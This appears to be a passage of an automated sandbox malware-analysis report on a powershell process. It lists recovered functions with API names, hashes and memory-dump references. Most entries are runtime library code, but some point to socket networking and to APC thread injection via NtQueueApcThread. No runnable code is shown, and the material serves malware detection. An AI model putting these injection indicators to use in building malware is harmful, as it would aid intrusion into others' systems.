                                                    Function 0000022EFA0D6E1C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 388111225-0
                                                    • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                    • Instruction ID: 5c137410c829bf5e0ee229d2ebb25bac19e548cbcf172b189fc7b540a1380409
                                                    • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                    • Instruction Fuzzy Hash: 1A31C023720741A6EB16AFE5BA5935D2550AB897A0F974514BA111FFE3CF3CC481A710
                                                    Function 0000022EF9B3F150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1812809483-0
                                                    • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                    • Instruction ID: f80dabe517a76c2a09795a5d716e9c1dc033c6f9ec2531cf19861cfcfa09fd98
                                                    • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                    • Instruction Fuzzy Hash: 25412275710751E1FF30EBE39B28BA972A0E774BA6FD24121EAD443EC5D728C841A708
                                                    Function 0000022EFA0DFD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1812809483-0
                                                    • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                    • Instruction ID: a7679a054c071b89869fe8e21eb602fa8165f87a900cb1504938d262f3715795
                                                    • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                    • Instruction Fuzzy Hash: 6341F87360035165FF60AF95B6183A93291EB5CB98F628121EA544FFE6DF3CC841E720
                                                    Function 0000022EFA0D027C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1550138920-0
                                                    • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                    • Instruction ID: fa32f25c5fa858a9c798552bf5486396334a60aba4add4dbc3aa5c6b90db0c7c
                                                    • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                    • Instruction Fuzzy Hash: 01418132212B45A3EE409F91FA8C31973A4F78CB84F464029998E4BF74DF7CC555A704
                                                    Function 0000022EFA0C6500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 3339321253-0
                                                    • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                    • Instruction ID: 230554bf769175d005c13906dd4eca4a61093ccb290ba61c559848aaf7f97440
                                                    • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                    • Instruction Fuzzy Hash: 22310662714641A2EF359FA1FA983AA6351F74CB94F111124EE0A4BFE4DF3CC545E700
                                                    Function 0000022EFA0C6B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                                    • String ID:
                                                    • API String ID: 3610715900-0
                                                    • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                    • Instruction ID: ffa5af8febb542efdefabac7579104aca57f94cb5fdc9124e9ca371ead051d92
                                                    • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                    • Instruction Fuzzy Hash: 31311E31200A41E2EF619FA6FA8C32963B0E74CB84F2A5525DE494FF75DB3CC495A711
                                                    Function 0000022EF9B37008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                    • String ID:
                                                    • API String ID: 4140391395-0
                                                    • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                                                    • Instruction ID: 534966bcfe9796a891d41a1a4de8c8fe459df504574aaa0ddab7fd7353883352
                                                    • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                                                    • Instruction Fuzzy Hash: FB21292230054071FF31AFE59AA9BAD7651A7A0FB1F0B4314EAB517BD2CB7CC441A728
                                                    Function 0000022EF9B36E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                    • String ID:
                                                    • API String ID: 310312816-0
                                                    • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                                                    • Instruction ID: a2a1f6ddc6da6401c600f2893d9d0070394f1689c96f8238a8e401d077911cfe
                                                    • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                                                    • Instruction Fuzzy Hash: 64210B21B00540A5FF31EFE59AAEBAD6650A7A07A1F174114EA9507FD2CB78C841A71C
                                                    Function 0000022EFA0D7A90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                    • String ID:
                                                    • API String ID: 310312816-0
                                                    • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                    • Instruction ID: f54d9f9b617956cdbe525644043f23ac4cc593405634832513fa0e3af55cde44
                                                    • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                    • Instruction Fuzzy Hash: 2121F03370024066FF166FE5BA493AD6661AB887B5F5B5114AA150FFF3CF7C8881A320
                                                    Function 0000022EFA0D7C08 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                    • String ID:
                                                    • API String ID: 4140391395-0
                                                    • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                    • Instruction ID: 74a37f0deae5cc1fd1a1ab08c1dc7dfea59edd0e9c7b30c40c3e4bae36b12c63
                                                    • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                    • Instruction Fuzzy Hash: 9821F92370064069FF166F95BA4936D7561AB88BB1F1B5718AA350FFF2CF3C8481A720
                                                    Function 0000022EF9B2F36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno
                                                    • String ID:
                                                    • API String ID: 2288870239-0
                                                    • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                    • Instruction ID: ea9e0da19f18427fd2c0d364bcf68c07cc2d24b2883e77d9f552799045f32253
                                                    • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                    • Instruction Fuzzy Hash: 1C312B22201A44A1FE77DFD3EBBD36423A0EBB4791F5A022989DD06E95CF68C444A35D
                                                    Function 0000022EFA0C3A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                                                    • String ID: NtQueueApcThread$ntdll
                                                    • API String ID: 1427994231-1374908105
                                                    • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                    • Instruction ID: 05ba0cc00f16dfdea423ce6d5890c1c0c00343f6842bf68d6faf68004a1b69fe
                                                    • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                    • Instruction Fuzzy Hash: 79416932711B41A9EF20CBA1EA4879CB3A4BB4CB88F4641259E4C5BFA9EF3CC545D740
                                                    Function 0000022EF9B35834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                    • String ID:
                                                    • API String ID: 2611593033-0
                                                    • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                                                    • Instruction ID: 5f5e217383f83fc2556ac6a2c0d443e26d08b5f807dfe98ede1f5db070806560
                                                    • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                                                    • Instruction Fuzzy Hash: B5213B2270854061FF31EFE59E6DBBD6650A7A0BA1F074214EA9907BD2CBB88441E768
                                                    Function 0000022EFA0D6434 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                    • String ID:
                                                    • API String ID: 2611593033-0
                                                    • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                    • Instruction ID: 87d6bec50cba95738ddf97ef3d37bd09f0097fb1b9f8531888652046f90a91e1
                                                    • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                    • Instruction Fuzzy Hash: 0721F223B2024066FF166FA5BA4936D2950AB887A1F174114BA140FFF6DF7C8481A720
                                                    Function 0000022EFA0DA73C Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                                    • String ID:
                                                    • API String ID: 2289611984-0
                                                    • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                    • Instruction ID: 13bdfdbe4c078e5a4cfced77f24639c8f42e46d1c4c0e90f1230faaa46557a6e
                                                    • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                    • Instruction Fuzzy Hash: 8A21A12332064165FE15AFE5BBCC36D66609B88760F1B01289A150FFF2CE7C8881B355
                                                    Function 0000022EF9B35058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                    • String ID:
                                                    • API String ID: 4060740672-0
                                                    • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                    • Instruction ID: a1de30a9f8a26cd13b4eb83594b3cc92c6c5126487d02a7dae4f2a994434c533
                                                    • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                    • Instruction Fuzzy Hash: FC11592230868071FF31EFE59FBDBAC6610A7A1B60F1B4524D59907BC3C6FA8440A31C
                                                    Function 0000022EFA0D5C58 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                    • String ID:
                                                    • API String ID: 4060740672-0
                                                    • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                    • Instruction ID: 1e022eec43365a84dafc436e4a5fe75cef15b94188db841e9664fe1580b8de20
                                                    • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                    • Instruction Fuzzy Hash: 2711D3237102806AFF156FA5BA8D35C3A51AF88761F6B1624AD150FFF2CE7C8481A320
                                                    Function 0000022EF9B13A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$malloc$_errno$_callnewh
                                                    • String ID:
                                                    • API String ID: 4160633307-0
                                                    • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                                    • Instruction ID: 72659dd0de3eb4987b4fe510d1a0713ab902633025b365e13c8208fa4ef68a15
                                                    • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                                    • Instruction Fuzzy Hash: BA71282230478466EF329FA695687AE7791F7A4BC8F064029DD8647F86EB38C445E708
                                                    Function 0000022EFA0B460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                                    • String ID:
                                                    • API String ID: 3534990644-0
                                                    • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                    • Instruction ID: 87775b0fd298515e3e07855f3a3f9b85d3611fbf7d22b1f8a970de51a1170635
                                                    • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                    • Instruction Fuzzy Hash: 5C7125223007C466EF209AA6B6687AE7791F78DBC8F024115DD468FFA6EB3DC505E700
                                                    Function 0000022EF9B1BE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                                                    • String ID: /'); %s
                                                    • API String ID: 1314452303-1283008465
                                                    • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                                    • Instruction ID: 83714c9e35bcb158ad9b8df8ca4f414ef135296f02d934a12a003b647fa048fd
                                                    • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                                    • Instruction Fuzzy Hash: 06C1C12160024162FF76FBE2967D7A92391EBA5780F534028ADD54BFC7DE38C846E708
                                                    Function 0000022EFA0CB47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
